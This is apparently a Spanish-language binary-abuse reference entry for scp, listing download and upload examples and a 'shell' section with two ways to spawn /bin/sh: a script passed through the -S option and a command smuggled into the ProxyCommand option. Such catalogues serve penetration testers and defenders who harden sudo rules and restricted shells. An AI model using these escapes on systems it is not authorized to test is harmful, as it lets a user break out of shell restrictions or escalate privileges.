./scp --examples
Funciones y ejemplos de uso
download
scp [email protected]:/path/to/input-file /path/to/output-file
shell
echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file
chmod +x /path/to/temp-file
scp -S /path/to/temp-file x x:
scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:
upload
scp /path/to/input-file [email protected]:/path/to/output-file
./related --binary=scp
Binarios relacionados
Comparten al menos una función con scp.